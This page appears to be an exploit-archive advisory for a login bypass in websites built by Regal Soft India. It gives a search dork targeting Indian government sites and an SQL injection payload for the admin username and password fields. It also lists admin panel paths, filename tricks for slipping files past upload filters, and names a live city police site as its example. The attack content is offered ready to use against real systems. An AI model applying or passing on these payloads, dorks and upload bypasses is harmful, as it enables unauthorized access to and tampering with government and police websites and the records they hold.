Developed by Regal Soft India WebDesign Admin Login Bypass Vulnerability

2018.06.25

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

Dork: intext:''Developed by Regal Soft India'' site:gov.in

#################################################################################################
# Exploit Title : Developed by Regal Soft India WebDesign Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepage : regalsoftindia.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Developed by Regal Soft India'' site:gov.in
# Administration Login Path => /site/admin/
# Exploit :
Username : anything' OR 'x'='x
Password : anything' OR 'x'='x
# Useable URL Paths in the Administration Control Panel =>
/site/admin/home.php
/site/admin/cpimg_upload.php
/site/admin/officeradmin.php
/site/admin/pswd.php
/site/admin/upload_rec.php
/site/admin/upload_positivestories.php
/site/admin/upload_policestation.php
/site/admin/upload_links.php
/site/admin/upload_news.php
/site/admin/upload_accident.php
/site/admin/upload_press.php
/site/admin/upload_fir.php
/site/admin/upload_missingperson.php
/site/admin/upload_deadbody.php
/site/admin/upload_drunk.php
/site/admin/upload_arrest.php
/site/admin/upload_criminal.php
/site/admin/upload_scst.php
/site/admin/upload_review.php
/site/admin/slider.php
/site/admin/cp_list.php
/site/admin/dcphq_list.php
/site/admin/dcpzone_list.php
/site/admin/dcpzone_list2.php
/site/admin/upload_gallery.php
/site/admin/upload_video.php
/site/admin/upload_certificate.php
Uploaded Files Paths => /site/admin/img/RANDOMNUMBERS_yourfilename.php;.gif
Note : PHP and ASP is not directly supported by the system. So it cannot be upload shell. But html gif jpng png txt is allowed.
You can upload your files like =>
yourfilename.php;.gif
yourfilename.png .gif .jpg .jpeg
yourfilename.php.fla
yourfilename.shtml.jpg
yourfilename.htm
yourfilename.sphp.jpeg
yourfilename.pdf
#################################################################################################
# Example Site : aurangabadcitypolice.gov.in/site/admin/ => [ Proof of Concept ] => archive.is/R05YW
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Developed by Regal Soft India WebDesign Admin Login Bypass Vulnerability

Dork: intext:''Developed by Regal Soft India'' site:gov.in

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.